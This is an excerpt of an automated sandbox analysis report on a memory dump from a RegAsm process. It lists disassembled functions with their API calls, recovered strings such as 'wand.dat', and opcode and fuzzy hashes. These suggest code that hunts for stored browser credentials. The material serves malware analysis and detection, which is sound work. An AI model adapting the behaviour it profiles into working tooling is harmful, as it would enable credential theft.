                            • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                            • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                            • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                            • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                            • Part of subcall function 0040A212: wcscpy.MSVCRT ref: 0040A269
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                          • String ID: *.*$dat$wand.dat
                          • API String ID: 2618321458-1828844352
                          • Opcode ID: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                          • Instruction ID: e27ea46a2f82f1f177a07810d763c9ecc86b2647b265d762bc330c580f82b585
                          • Opcode Fuzzy Hash: 5e8bba3b09b46c55a34cdaf5677a7ea6a58b6119ecbf68cda4806ea60e88d929
                          • Instruction Fuzzy Hash: BF419B71600205AFDB10AF65DC85EAEB7B9FF40314F10802BF909AB1D1EF7999958F89
                          Function 00412018 Relevance: 6.1, APIs: 4, Instructions: 99windowkeyboardCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 00412057
                            • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                          • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                          • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                          • GetKeyState.USER32(00000010), ref: 0041210D
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ExecuteMenuMessageSendShellStateStringmemset
                          • String ID:
                          • API String ID: 3550944819-0
                          • Opcode ID: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                          • Instruction ID: 97bad96470fefb965444fbd8e179d7ef3b872eae7f66eff2ef5a186de824ffeb
                          • Opcode Fuzzy Hash: c6d93ad011cba3496463107dfdcdd9c7ff15c0246bd0a1dd9e2f28c94b3d1ec4
                          • Instruction Fuzzy Hash: 5341C330600305EBDB209F15CD88B9677A8AB54324F10817AEA699B2E2D7B89DD1CB14
                          Function 0040F508 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 73COMMON
                          Download Yara Rule
                          APIs
                          • free.MSVCRT ref: 0040F561
                          • memcpy.MSVCRT(00000000,?,00000001,g4@,00000000,0000121C,?,?,?,00403467), ref: 0040F573
                          • memcpy.MSVCRT(00000000,?,?,00000000), ref: 0040F5A6
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$free
                          • String ID: g4@
                          • API String ID: 2888793982-2133833424
                          • Opcode ID: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                          • Instruction ID: 6372a4083673351870aa2a156e9431cadfa41d37230e9e7fabcd635cb7c3c96e
                          • Opcode Fuzzy Hash: d5a05b92b3455112f10c9f31d65c512587a8559eeac8cc3fc14f0db32937a076
                          • Instruction Fuzzy Hash: D2217A30900604EFCB20DF29C94182ABBF5FF447247204A7EE852A3B91E735EE119B04
                          Function 004144BB Relevance: 6.1, APIs: 4, Instructions: 55COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004144E7
                            • Part of subcall function 0040A353: _snwprintf.MSVCRT ref: 0040A398
                            • Part of subcall function 0040A353: memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                          • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 00414510
                          • memset.MSVCRT ref: 0041451A
                          • GetPrivateProfileStringW.KERNEL32(?,?,0044E518,?,00002000,?), ref: 0041453C
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: PrivateProfileStringmemset$Write_snwprintfmemcpy
                          • String ID:
                          • API String ID: 1127616056-0
                          • Opcode ID: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                          • Instruction ID: e03fcf36bb778615f94f946172f2cadce4c7e53e7889dedf6030812535802df7
                          • Opcode Fuzzy Hash: 02b9e3d0e0b7074fd9b2be70e01a8c10e85f5fbe64ebb4837650a41ca567b1c2
                          • Instruction Fuzzy Hash: 9A1170B1500119BFEF115F65EC02EDA7B69EF04714F100066FB09B2060E6319A60DB9D
                          Function 00417434 Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                          Download Yara Rule
                          APIs
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,756F18FE,?,0041755F,?), ref: 00417452
                          • malloc.MSVCRT ref: 00417459
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,756F18FE,?,0041755F,?), ref: 00417478
                          • free.MSVCRT ref: 0041747F
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$freemalloc
                          • String ID:
                          • API String ID: 2605342592-0
                          • Opcode ID: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                          • Instruction ID: 8389f0226c663b3c6d8c6253af8546a3d73aba679155ae8f7c82d0c1376384d0
                          • Opcode Fuzzy Hash: 04ed014176e6e25a75c769d411d0e5b4418e4c479d680d12870536ad94e91e4d
                          • Instruction Fuzzy Hash: 1DF0E9B620D21E3F7B006AB55CC0C7B7B9CD7862FCB11072FF51091180E9594C1116B6
                          Function 004123E2 Relevance: 6.0, APIs: 4, Instructions: 47registryCOMMON
                          Download Yara Rule
                          APIs
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00412403
                          • RegisterClassW.USER32(?), ref: 00412428
                          • GetModuleHandleW.KERNEL32(00000000), ref: 0041242F
                          • CreateWindowExW.USER32(00000000,00000000,0044E518,00CF0000,00000000,00000000,00000280,000001E0,00000000,00000000,00000000), ref: 00412455
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: HandleModule$ClassCreateRegisterWindow
                          • String ID:
                          • API String ID: 2678498856-0
                          • Opcode ID: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                          • Instruction ID: 2742b6e08e64d4f702ac0bdc031c2178a10537c5a2141806c9029dd5a11ba4c1
                          • Opcode Fuzzy Hash: ffa2941c40dc3e4da5dfeb6f60aef2ef72cf6d205e20c7803454451710b81cbd
                          • Instruction Fuzzy Hash: E601E5B1941228ABD7119FA68C89ADFBEBCFF09B14F10411AF514A2240D7B456408BE9
                          Function 0040F64E Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040F673
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,00007FFF,00000000,00000000,?,<item>), ref: 0040F690
                          • strlen.MSVCRT ref: 0040F6A2
                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F6B3
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                          • String ID:
                          • API String ID: 2754987064-0
                          • Opcode ID: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                          • Instruction ID: e5447571fde1e0de43d26e7f5909b1ba013d3ab3fbf9ce0dfcc5e01eb4e41d37
                          • Opcode Fuzzy Hash: 3f0454cb73c2afb10a3316e2dc28fa1dd1c693e32e23138b57773469a51e87f3
                          • Instruction Fuzzy Hash: 03F062B680102C7FEB81A794DC81DEB77ACEB05258F0080B2B715D2140E9749F484F7D
                          Function 0040F6BD Relevance: 6.0, APIs: 4, Instructions: 41filestringCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040F6E2
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00001FFF,00000000,00000000,?,<item>), ref: 0040F6FB
                          • strlen.MSVCRT ref: 0040F70D
                          • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0040F71E
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharFileMultiWideWritememsetstrlen
                          • String ID:
                          • API String ID: 2754987064-0
                          • Opcode ID: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                          • Instruction ID: 4069f22fd96ae38f7b0fbed24adb75974e75abfa9f51d26af0f678a77882025e
                          • Opcode Fuzzy Hash: 7e04724105a3fa4aadef5922e8bb643722353f9661974f919d975e4a71db6ff5
                          • Instruction Fuzzy Hash: C8F06DB780022CBFFB059B94DCC8DEB77ACEB05254F0000A2B715D2042E6749F448BB8
                          Function 00414770 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 40COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: wcscpy$CloseHandle
                          • String ID: General
                          • API String ID: 3722638380-26480598
                          • Opcode ID: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                          • Instruction ID: 029e45c8424a23c50dbc4d8c1dfe1f9d14d00e2cf8bd1bf10ef2c4f99c7741b7
                          • Opcode Fuzzy Hash: d203a37054ecec13293c6845d931113d91e33057b6480a05be5df7ab04b5f2c3
                          • Instruction Fuzzy Hash: 52F024B30083146FF7205B509C85EAF769CEB86369F25482FF05592092C7398C448669
                          Function 0041437B Relevance: 6.0, APIs: 4, Instructions: 38COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00409D7F: memset.MSVCRT ref: 00409D9E
                            • Part of subcall function 00409D7F: GetClassNameW.USER32(?,00000000,000000FF), ref: 00409DB5
                            • Part of subcall function 00409D7F: _wcsicmp.MSVCRT ref: 00409DC7
                          • SetBkMode.GDI32(?,00000001), ref: 004143A2
                          • SetBkColor.GDI32(?,00FFFFFF), ref: 004143B0
                          • SetTextColor.GDI32(?,00C00000), ref: 004143BE
                          • GetStockObject.GDI32(00000000), ref: 004143C6
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Color$ClassModeNameObjectStockText_wcsicmpmemset
                          • String ID:
                          • API String ID: 764393265-0
                          • Opcode ID: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                          • Instruction ID: 55a1794077c12dabf0ba6e1c8d3319674f3f2ba5a0574a39bcd6537ad23d1771
                          • Opcode Fuzzy Hash: 511a8a1029f4fd91347c0110e60971c3c9d55721028eb227f3be943e95f629a7
                          • Instruction Fuzzy Hash: 3AF06835200219BBCF112FA5EC06EDD3F25BF05321F104536FA25A45F1CBB59D609759
                          Function 0040A751 Relevance: 6.0, APIs: 4, Instructions: 34timeCOMMON
                          Download Yara Rule
                          APIs
                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A76D
                          • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?,?,?), ref: 0040A77D
                          • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 0040A78C
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: Time$System$File$LocalSpecific
                          • String ID:
                          • API String ID: 979780441-0
                          • Opcode ID: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                          • Instruction ID: f583aad53f3de4022dcae7e9f33737e8013f67213d7447df07319dea818b2b95
                          • Opcode Fuzzy Hash: e6f681992166f7eacb6a90eac37249c69a118d36aeffaac3dc06015c0a75a69a
                          • Instruction Fuzzy Hash: 48F08272900219AFEB019BB1DC49FBBB3FCBB0570AF04443AE112E1090D774D0058B65
                          Function 004134C6 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                          Download Yara Rule
                          APIs
                          • memcpy.MSVCRT(0045A808,?,00000050,?,0040155D,?), ref: 004134E0
                          • memcpy.MSVCRT(0045A538,?,000002CC,0045A808,?,00000050,?,0040155D,?), ref: 004134F2
                          • GetModuleHandleW.KERNEL32(00000000), ref: 00413505
                          • DialogBoxParamW.USER32(00000000,0000006B,?,Function_000131DC,00000000), ref: 00413519
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: memcpy$DialogHandleModuleParam
                          • String ID:
                          • API String ID: 1386444988-0
                          • Opcode ID: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                          • Instruction ID: 364e94b7bdcda47f4d7f1f8d7aeee0d56301a77e6e21c3ce81869cca2c347424
                          • Opcode Fuzzy Hash: d55c8f406ca3c44be23ebae39d0952233c85391216aaf70b52daa0aa76105663
                          • Instruction Fuzzy Hash: 80F0E272A843207BF7207FA5AC0AB477E94FB05B03F114826F600E50D2C2B988518F8D
                          Function 0040F75C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                          Download Yara Rule
                          APIs
                          • wcschr.MSVCRT ref: 0040F79E
                          • wcschr.MSVCRT ref: 0040F7AC
                            • Part of subcall function 0040AA8C: wcslen.MSVCRT ref: 0040AAA8
                            • Part of subcall function 0040AA8C: memcpy.MSVCRT(00000000,?,00000000,00000000,?,0000002C,?,0040F7F4,?,?,?,?,004032AB,?), ref: 0040AACB
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: wcschr$memcpywcslen
                          • String ID: "
                          • API String ID: 1983396471-123907689
                          • Opcode ID: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                          • Instruction ID: b5ec2b97dc3a1d34b4ae52474db4a85f3d32b900c8044ec90cdce640e07fed14
                          • Opcode Fuzzy Hash: a49a7bca3fdcf7d664bb1a19bbfdf9ac20233bdad490a911e177b035a317b33a
                          • Instruction Fuzzy Hash: 7C315532904204ABDF24EFA6C8419EEB7B4EF44324F20457BEC10B75D1DB789A46CE99
                          Function 0040A353 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58COMMON
                          Download Yara Rule
                          APIs
                          • _snwprintf.MSVCRT ref: 0040A398
                          • memcpy.MSVCRT(?,00000000,00000006,00000000,0000000A,%2.2X ,?), ref: 0040A3A8
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: _snwprintfmemcpy
                          • String ID: %2.2X
                          • API String ID: 2789212964-323797159
                          • Opcode ID: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                          • Instruction ID: 802357eb4f50a043e47c8b78e7782d62930b20b04af67ea92e1f933aeb07fc5a
                          • Opcode Fuzzy Hash: 565383a1db30c24bbe212324ccaa161bb2139c15501903e42e5a35b00c7b7038
                          • Instruction Fuzzy Hash: 71118E32900309BFEB10DFE8D8829AFB3B9FB05314F108476ED11E7141D6789A258B96
                          Function 0040E758 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41windowCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040E770
                          • SendMessageW.USER32(F^@,0000105F,00000000,?), ref: 0040E79F
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: MessageSendmemset
                          • String ID: F^@
                          • API String ID: 568519121-3652327722
                          • Opcode ID: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                          • Instruction ID: 5049a961280a3e8282645b70ff0f7bf8ff78c54eb6baa8beabb6daf17925e322
                          • Opcode Fuzzy Hash: f8314852293f46423bc2a010faad31e0b7cb282108ef47112cad279f3d3f551f
                          • Instruction Fuzzy Hash: A701A239900204ABEB209F5ACC81EABB7F8FF44B45F008429E854A7291D3349855CF79
                          Function 004018DB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: PlacementWindowmemset
                          • String ID: WinPos
                          • API String ID: 4036792311-2823255486
                          • Opcode ID: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                          • Instruction ID: 942d740d8c3c01bede0812328a3a4706cce13fdf2e849e9dfea5930b7654417c
                          • Opcode Fuzzy Hash: 43a26fe09d4836415a0f9153b5f51c370111d8f5fda2234af2192006d5bb601b
                          • Instruction Fuzzy Hash: D4F096B0600204EFEB04DF55D899F6A33E8EF04701F1440B9F909DB1D1E7B89A04C729
                          Function 004125B6 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                          Download Yara Rule
                          APIs
                          • ??3@YAXPAX@Z.MSVCRT(?,?,00412966,/deleteregkey,/savelangfile), ref: 004125C3
                          • DeleteObject.GDI32(00000000), ref: 004125E7
                          Strings
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??3@DeleteObject
                          • String ID: r!A
                          • API String ID: 1103273653-628097481
                          • Opcode ID: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                          • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                          • Opcode Fuzzy Hash: 50c536e2c83fb8bec4500b48a67d64bb266b61e0188dcb515110e4721c15bf1b
                          • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                          Function 0040E820 Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??2@$memset
                          • String ID:
                          • API String ID: 1860491036-0
                          • Opcode ID: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                          • Instruction ID: 7dda0de82ffecb18951b1be6aadeef514c87807746e1e94fbb8d74dd8fa57bec
                          • Opcode Fuzzy Hash: 132c9519558d853c1af1b7fa7761ae76911dbcbc7ff65e94ed4645376a2186b4
                          • Instruction Fuzzy Hash: 4F21F3B1A003008FDB219F2B9445912FBE8FF90310B2AC8AF9158CB2B2D7B8C454CF15
                          Function 0040A8D0 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                          Download Yara Rule
                          APIs
                          • wcslen.MSVCRT ref: 0040A8E2
                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                          • free.MSVCRT ref: 0040A908
                          • free.MSVCRT ref: 0040A92B
                          • memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free$memcpy$mallocwcslen
                          • String ID:
                          • API String ID: 726966127-0
                          • Opcode ID: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                          • Instruction ID: f32a9ac0308abec2140ef864181b54c8d04bf3279582b466e144db770ea3622c
                          • Opcode Fuzzy Hash: 4562b1f94f0a461de08a7f5e91ae4aaaeb7b7426ec7425c8aec4e78307d57c52
                          • Instruction Fuzzy Hash: 64217CB2200704EFC720DF18D88189AB3F9FF453247118A2EF866AB6A1CB35AD15CB55
                          Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                          Download Yara Rule
                          APIs
                          • wcslen.MSVCRT ref: 0040B1DE
                          • free.MSVCRT ref: 0040B201
                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                          • free.MSVCRT ref: 0040B224
                          • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free$memcpy$mallocwcslen
                          • String ID:
                          • API String ID: 726966127-0
                          • Opcode ID: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                          • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                          • Opcode Fuzzy Hash: 6ce6fee0dcc9b9c9ebe83d30a233e08065b6d511c8ed6dc8d89b241ff4cd5fb7
                          • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                          Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                          Download Yara Rule
                          APIs
                          • strlen.MSVCRT ref: 0040B0D8
                          • free.MSVCRT ref: 0040B0FB
                            • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                            • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                            • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                          • free.MSVCRT ref: 0040B12C
                          • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: free$memcpy$mallocstrlen
                          • String ID:
                          • API String ID: 3669619086-0
                          • Opcode ID: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                          • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                          • Opcode Fuzzy Hash: 1032aca3c4d565b21c9c93c1da03fa01242ca6c05261a3900927d5bb2d17b358
                          • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                          Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ??2@
                          • String ID:
                          • API String ID: 1033339047-0
                          • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                          • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                          • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                          • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                          Function 004173E4 Relevance: 5.0, APIs: 4, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,00417D63,?,?,00417D63,00418178,00000000,?,004183E5,?,00000000), ref: 004173FF
                          • malloc.MSVCRT ref: 00417407
                          • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00418178,000000FF,00000000,00000000,?,00417D63,00418178,00000000,?,004183E5,?,00000000,00000000,?), ref: 0041741E
                          • free.MSVCRT ref: 00417425
                          Memory Dump Source
                          • Source File: 0000000D.00000002.397017263.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                          Similarity
                          • API ID: ByteCharMultiWide$freemalloc
                          • String ID:
                          • API String ID: 2605342592-0
                          • Opcode ID: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                          • Instruction ID: cad4d062c051d68cf548c6c9b5623cfc012c7edadb1d539185634ca375d1558c
                          • Opcode Fuzzy Hash: 3df1ff1ad5f7619570b5295ff2d6745c95529d6511ab958c6202ec18d606cc9c
                          • Instruction Fuzzy Hash: E7F0377620921E7BDA1029655C40D77779CEB8B675B11072BBA10D21C1ED59D81005B5